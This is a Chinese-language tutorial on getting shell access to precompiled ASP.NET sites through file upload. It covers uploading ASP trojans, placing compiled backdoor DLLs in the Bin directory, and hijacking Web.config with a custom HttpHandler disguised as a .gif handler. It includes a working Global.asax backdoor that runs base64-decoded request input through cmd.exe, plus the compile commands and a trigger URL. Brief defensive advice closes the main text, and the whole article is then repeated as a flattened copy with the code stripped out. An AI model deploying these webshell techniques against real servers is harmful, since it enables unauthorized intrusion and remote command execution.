.NET文件上传绕过预编译限制获取Shell的多种方法

背景与困境

在.NET环境下，预编译是一种提高性能和安全性的机制，它会将所有.NET文件编译成DLL，使得源代码不可见且无法直接修改。在预编译模式下，上传的普通aspx木马会显示"未预编译文件，因此不能请求该文件"的错误。

预编译原理

编译选项

预编译通过Visual Studio发布选项或aspnet_compiler命令行工具实现
默认勾选"允许更新预编译站点"时，aspx文件可修改
不勾选时，所有aspx文件内容会被重写为"这是预编译工具生成的标记文件，不应删除!"

编译生成文件

.compiled文件：XML格式，包含指向程序集的信息
- 命名格式：[page].aspx.[folder-hash].compiled
- 包含虚拟路径、hash值、程序集名称等信息
.dll文件：实际编译后的程序集
PrecompiledApp.config文件
- 控制站点预编译状态
- updatable属性为false时禁止更新预编译文件

绕过预编译的多种方法

方法1：上传ASP脚本

IIS默认支持ASP脚本处理(需启用ASP功能)
ASP由asp.dll处理，与.NET无关
上传ASP木马可直接获取Shell

方法2：上传至Bin目录

场景：能够跨目录上传文件时

编译恶意aspx文件：

aspnet_compiler -v /虚拟路径 -p 源项目路径 输出路径 -fixednames

生成.compiled和.dll两个文件

上传三个文件：
- 编译后的.compiled和.dll到Bin目录
- aspx占位符文件到站点根目录
访问aspx文件即可执行

替代方案：利用Global.asax

在Application_Start或Application_BeginRequest方法中添加恶意代码
编译后上传App_global.asax.dll和App_global.asax.compiled到Bin目录

示例代码：

private void Application_BeginRequest(object sender, EventArgs e) {
    if (!string.IsNullOrEmpty(HttpContext.Current.Request["content"])) {
        Process.Start("cmd.exe", "/c " + Encoding.GetEncoding("utf-8")
            .GetString(Convert.FromBase64String(HttpContext.Current.Request["content"])));
    }
}

方法3：利用Web.config

场景：只能上传到固定目录(如/Lib/)但能修改Web.config

创建自定义HttpHandler DLL：
- 继承IHttpHandler接口
- 实现命令执行、文件写入等功能
- 示例功能：
  - 生成验证码图片作为伪装
  - 创建aspx一句话木马
  - 执行系统命令

编译DLL：

csc.exe /t:library /r:System.Web.dll -out:输出路径\IsapiModules.Handler.dll 源文件.cs

修改Web.config：

添加handler映射：

<system.webServer>
  <handlers accessPolicy="Read, Script, Write">
    <add name="自定义名称" path="*.gif" verb="*" 
         type="IsapiModules.Handler,IsapiModules.Handler" 
         preCondition="integratedMode" resourceType="Unspecified"/>
  </handlers>
</system.webServer>

添加程序集搜索路径：

<configuration>  
   <runtime>  
      <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">  
         <probing privatePath="Lib"/>  
      </assemblyBinding>  
   </runtime>  
</configuration>

访问触发：

http://目标/Lib/any.gif?a=c&p=cmd.txt&c=ver

其他潜在方法

利用反序列化漏洞写入GhostWebshell
内存马技术(需结合其他漏洞)

防御建议

严格限制上传文件类型和内容
限制Web.config的修改权限
监控Bin目录的文件变更
使用最小权限原则运行应用程序
定期审计服务器上的异常文件

总结

绕过.NET预编译限制需要结合具体环境选择合适的方法，从ASP脚本、Bin目录上传到Web.config利用，攻击面逐渐缩小但技术难度递增。防御方应实施纵深防御策略，从多个层面阻断攻击路径。

.NET文件上传绕过预编译限制获取Shell的多种方法背景与困境在.NET环境下，预编译是一种提高性能和安全性的机制，它会将所有.NET文件编译成DLL，使得源代码不可见且无法直接修改。在预编译模式下，上传的普通aspx木马会显示"未预编译文件，因此不能请求该文件"的错误。预编译原理编译选项预编译通过Visual Studio发布选项或 aspnet_compiler 命令行工具实现默认勾选"允许更新预编译站点"时，aspx文件可修改不勾选时，所有aspx文件内容会被重写为"这是预编译工具生成的标记文件，不应删除 !" 编译生成文件 .compiled 文件：XML格式，包含指向程序集的信息命名格式： [page].aspx.[folder-hash].compiled 包含虚拟路径、hash值、程序集名称等信息 .dll 文件：实际编译后的程序集 PrecompiledApp.config 文件控制站点预编译状态 updatable 属性为false时禁止更新预编译文件绕过预编译的多种方法方法1：上传ASP脚本 IIS默认支持ASP脚本处理(需启用ASP功能) ASP由 asp.dll 处理，与.NET无关上传ASP木马可直接获取Shell 方法2：上传至Bin目录场景：能够跨目录上传文件时编译恶意aspx文件：生成 .compiled 和 .dll 两个文件上传三个文件：编译后的 .compiled 和 .dll 到Bin目录 aspx占位符文件到站点根目录访问aspx文件即可执行替代方案：利用Global.asax 在 Application_Start 或 Application_BeginRequest 方法中添加恶意代码编译后上传 App_global.asax.dll 和 App_global.asax.compiled 到Bin目录示例代码：方法3：利用Web.config 场景：只能上传到固定目录(如/Lib/)但能修改Web.config 创建自定义HttpHandler DLL：继承 IHttpHandler 接口实现命令执行、文件写入等功能示例功能：生成验证码图片作为伪装创建aspx一句话木马执行系统命令编译DLL：修改Web.config：添加handler映射：添加程序集搜索路径：访问触发：其他潜在方法利用反序列化漏洞写入GhostWebshell 内存马技术(需结合其他漏洞) 防御建议严格限制上传文件类型和内容限制Web.config的修改权限监控Bin目录的文件变更使用最小权限原则运行应用程序定期审计服务器上的异常文件总结绕过.NET预编译限制需要结合具体环境选择合适的方法，从ASP脚本、Bin目录上传到Web.config利用，攻击面逐渐缩小但技术难度递增。防御方应实施纵深防御策略，从多个层面阻断攻击路径。